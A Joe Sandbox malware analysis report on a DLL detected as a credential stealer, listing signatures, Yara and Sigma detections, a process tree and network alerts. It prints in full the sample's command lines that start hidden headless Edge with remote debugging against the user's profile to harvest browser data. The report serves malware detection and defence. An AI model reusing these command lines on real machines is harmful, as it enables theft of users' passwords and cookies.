Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mP8rzGD7fG.dll

Overview

General Information

Sample name:mP8rzGD7fG.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:ebcb219cffe49e60fccfd0ea6f95feb5166751426e70faafcc328ed1903d6324.exe
Analysis ID:1590663
MD5:32893397afbb3b64a7ad72505d57b2a2
SHA1:8d901669e2e7ed707de6f6b78783bdef94ca347e
SHA256:ebcb219cffe49e60fccfd0ea6f95feb5166751426e70faafcc328ed1903d6324
Tags:bot7711615259exeuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Telegram Recon
Drops password protected ZIP file
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6772 cmdline: loaddll64.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 432 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5180 cmdline: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • msedge.exe (PID: 5544 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7260 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1500,i,9890186816149597539,11445184587505823433,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rundll32.exe (PID: 5812 cmdline: rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers MD5: EF3179D498793BF4234F708D3BE28633)
      • msedge.exe (PID: 3180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9991 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7396 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1484 --field-trial-handle=1428,i,15056660553952727470,9252583371032052914,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 1360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9694 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 5848 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1504 --field-trial-handle=1404,i,7222753251508312572,843562090488949947,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8152 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9487 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7336 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1660 --field-trial-handle=1472,i,14150613680771438782,17375092338205965150,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rundll32.exe (PID: 7616 cmdline: rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeader MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7688 cmdline: C:\Windows\system32\WerFault.exe -u -p 7616 -s 412 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7824 cmdline: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbers MD5: EF3179D498793BF4234F708D3BE28633)
      • msedge.exe (PID: 7992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9268 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 8148 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1584 --field-trial-handle=1428,i,17945505886261408641,13113547458028761816,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7256 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9231 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 5824 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1512 --field-trial-handle=1404,i,8570248948414789044,17269091163832771516,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9582 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 2120 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1580 --field-trial-handle=1496,i,17156741464264009395,10585309956267009794,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rundll32.exe (PID: 7832 cmdline: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeader MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7892 cmdline: C:\Windows\system32\WerFault.exe -u -p 7832 -s 420 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
mP8rzGD7fG.dllJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: rundll32.exe PID: 5812JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: rundll32.exe PID: 7824JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5180, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-syn
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5180, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-syn
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5180, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-syn
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T13:13:37.686834+010028033053Unknown Traffic192.168.2.449948172.65.251.78443TCP
            2025-01-14T13:13:40.238724+010028033053Unknown Traffic192.168.2.449966172.67.74.152443TCP
            2025-01-14T13:13:40.860482+010028033053Unknown Traffic192.168.2.449970172.67.74.152443TCP
            2025-01-14T13:13:41.387537+010028033053Unknown Traffic192.168.2.449974208.95.112.180TCP
            2025-01-14T13:13:42.054391+010028033053Unknown Traffic192.168.2.449978172.67.74.152443TCP
            2025-01-14T13:13:42.656123+010028033053Unknown Traffic192.168.2.449983172.67.74.152443TCP
            2025-01-14T13:13:43.137986+010028033053Unknown Traffic192.168.2.449989208.95.112.180TCP
            2025-01-14T13:14:35.187230+010028033053Unknown Traffic192.168.2.450069172.67.74.152443TCP
            2025-01-14T13:14:35.833230+010028033053Unknown Traffic192.168.2.450070172.67.74.152443TCP
            2025-01-14T13:14:36.326610+010028033053Unknown Traffic192.168.2.450071208.95.112.180TCP
            2025-01-14T13:14:36.956790+010028033053Unknown Traffic192.168.2.450072172.67.74.152443TCP
            2025-01-14T13:14:37.563252+010028033053Unknown Traffic192.168.2.450073172.67.74.152443TCP
            2025-01-14T13:14:38.025849+010028033053Unknown Traffic192.168.2.450074208.95.112.180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: mP8rzGD7fG.dllVirustotal: Detection: 33%Perma Link
            Source: mP8rzGD7fG.dllReversingLabs: Detection: 47%
            Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49948 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49966 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:50069 version: TLS 1.2
            Source: mP8rzGD7fG.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: System.Diagnostics.Process.ni.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
